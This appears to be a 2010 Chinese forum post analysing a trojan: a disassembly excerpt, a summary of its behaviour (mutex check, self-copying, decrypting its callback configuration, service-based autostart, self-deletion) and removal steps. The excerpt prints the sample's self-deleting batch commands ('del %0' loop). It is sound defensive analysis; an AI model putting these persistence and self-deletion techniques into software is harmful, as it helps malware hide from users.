0046829E . BA 03000000 mov edx,3
004682A3 . E8 ECC7F9FF call Setup.00404A94
004682A8 . B2 01 mov dl,1
004682AA . A1 10304100 mov eax,dword ptr ds:[413010]
004682AF . E8 5CB6F9FF call Setup.00403910
004682B4 . 8BD8 mov ebx,eax
004682B6 . BA EC834600 mov edx,Setup.004683EC ; :delfile
004682BB . 8BC3 mov eax,ebx
004682BD . 8B08 mov ecx,dword ptr ds:[eax]
004682BF . FF51 38 call dword ptr ds:[ecx+38]
004682C2 . 68 00844600 push Setup.00468400 ; del "
004682C7 . FF75 FC push dword ptr ss:[ebp-4]
004682CA . 68 10844600 push Setup.00468410 ; "
004682CF . 8D45 98 lea eax,dword ptr ss:[ebp-68]
004682D2 . BA 03000000 mov edx,3
004682D7 . E8 B8C7F9FF call Setup.00404A94
004682DC . 8B55 98 mov edx,dword ptr ss:[ebp-68]
004682DF . 8BC3 mov eax,ebx
004682E1 . 8B08 mov ecx,dword ptr ds:[eax]
004682E3 . FF51 38 call dword ptr ds:[ecx+38]
004682E6 . 68 1C844600 push Setup.0046841C ; if exist "
004682EB . FF75 FC push dword ptr ss:[ebp-4]
004682EE . 68 30844600 push Setup.00468430 ; " goto delfile
004682F3 . 8D45 94 lea eax,dword ptr ss:[ebp-6C]
004682F6 . BA 03000000 mov edx,3
004682FB . E8 94C7F9FF call Setup.00404A94
00468300 . 8B55 94 mov edx,dword ptr ss:[ebp-6C]
00468303 . 8BC3 mov eax,ebx
00468305 . 8B08 mov ecx,dword ptr ds:[eax]
00468307 . FF51 38 call dword ptr ds:[ecx+38]
0046830A . BA 48844600 mov edx,Setup.00468448 ; del %0
0046830F . 8BC3 mov eax,ebx
00468311 . 8B08 mov ecx,dword ptr ds:[eax]
00468313 . FF51 38 call dword ptr ds:[ecx+38]
00468316 . BA 58844600 mov edx,Setup.00468458 ; exit
004748E1 > \6A 00 push 0
004748E3 . A1 C49C4700 mov eax,dword ptr ds:[479CC4]
004748E8 . 8B00 mov eax,dword ptr ds:[eax]
004748EA . FFD0 call eax ; kernel32.ExitProcess)
大体流程:
1.创建互斥体判断是否已经运行,运行则退出。
2.检查自复制的目录是否已经复制,是则删除重新自复制,并设置文件属性。
3.程序读自身的一些加密配置数据(安装目录和上线信息),然后解密。
4.创建服务达到自启动。
5.自删除。
查杀方法:
打开XueTr.exe,查找服务,可以明显看到木马(字体有色有差异),断开网络,停止服务,查找路径直接删除。
发表于 2010-3-5 20:53
发表于 2010-3-5 20:56
这些木马哪找的?